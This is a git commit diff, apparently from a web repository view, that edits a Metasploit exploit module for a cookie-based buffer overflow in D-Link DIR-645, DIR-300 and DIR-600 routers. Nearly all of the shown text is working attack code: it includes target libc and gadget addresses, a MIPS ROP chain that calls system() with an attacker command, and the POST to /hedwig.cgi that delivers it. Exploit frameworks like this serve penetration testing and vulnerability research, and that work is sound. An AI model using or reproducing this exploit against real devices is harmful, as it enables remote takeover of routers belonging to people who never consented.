clean up
parent
a3ae177347
commit
8eb21ded97
|
@ -6,7 +6,7 @@
|
|||
require 'msf/core'
|
||||
|
||||
class Metasploit3 < Msf::Exploit::Remote
|
||||
Rank = ManualRanking # the exploit as it is is excellent but we can only start the telnetd and connect to it
|
||||
Rank = ExcellentRanking
|
||||
|
||||
HttpFingerprint = { :pattern => [ /Linux,\ HTTP\/1.0,\ DIR-/ ] }
|
||||
|
||||
|
@ -39,10 +39,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
],
|
||||
'Targets' =>
|
||||
[
|
||||
[ 'D-Link DIR-645 v1.03',
|
||||
[ 'Multiple Targets: D-Link DIR-645 v1.03, DIR-300 v2.14, DIR-600',
|
||||
{
|
||||
'Offset' => 973,
|
||||
'LibcBase' => 0x2aaf8000, #Router
|
||||
'LibcBase' => 0x2aaf8000, # Router
|
||||
#'LibcBase' => 0x40854000, # QEMU environment
|
||||
'System' => 0x000531FF, # address of system
|
||||
'CalcSystem' => 0x000158C8, # calculate the correct address of system
|
||||
|
@ -84,13 +84,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
)
|
||||
end
|
||||
|
||||
|
||||
def prepare_shellcode(cmd)
|
||||
|
||||
# prepare our shellcode that triggers the crash:
|
||||
shellcode = "\x41" * target['Offset'] # padding
|
||||
shellcode = rand_text_alpha_upper(target['Offset']) # padding
|
||||
shellcode << [target['LibcBase'] + target['System']].pack("V") # s0 - address of system
|
||||
shellcode << "\x42" * 16 # unused reg $s1 - $s4
|
||||
shellcode << rand_text_alpha_upper(16) # unused reg $s1 - $s4
|
||||
shellcode << [target['LibcBase'] + target['CallSystem']].pack("V") # s5 - second gadget (call system)
|
||||
|
||||
# .text:000159CC 10 00 B5 27 addiu $s5, $sp, 0x170+var_160 # get the address of our command into $s5
|
||||
|
@ -100,14 +97,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# .text:000159DC 09 F8 20 03 jalr $t9 # call system
|
||||
# .text:000159E0 21 20 A0 02 move $a0, $s5 # our cmd -> into a0 as parameter for system
|
||||
|
||||
shellcode << "\x43" * 12 # unused registers $s6 - $fp
|
||||
shellcode << rand_text_alpha_upper(12) # unused registers $s6 - $fp
|
||||
shellcode << [target['LibcBase'] + target['CalcSystem']].pack("V") # $ra - gadget nr 1 (prepare the parameter for system)
|
||||
|
||||
# .text:000158C8 21 C8 A0 02 move $t9, $s5 # s5 - our second gadget
|
||||
# .text:000158CC 09 F8 20 03 jalr $t9 # jump the second gadget
|
||||
# .text:000158D0 01 00 10 26 addiu $s0, 1 # s0 our system address - lets calculate the right address
|
||||
|
||||
shellcode << "\x99" * 16 # filler in front of our command
|
||||
shellcode << rand_text_alpha_upper(16) # filler in front of our command
|
||||
shellcode << cmd
|
||||
end
|
||||
|
||||
|
@ -117,7 +114,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
begin
|
||||
res = send_request_cgi({
|
||||
'method' => 'POST',
|
||||
#'uri' => "/hedwig_gdb.cgi", #for debugging on the router
|
||||
'uri' => "/hedwig.cgi",
|
||||
'cookie' => "uid=#{shellcode}",
|
||||
'encode_params' => false,
|
||||
|
|
Loading…
Reference in New Issue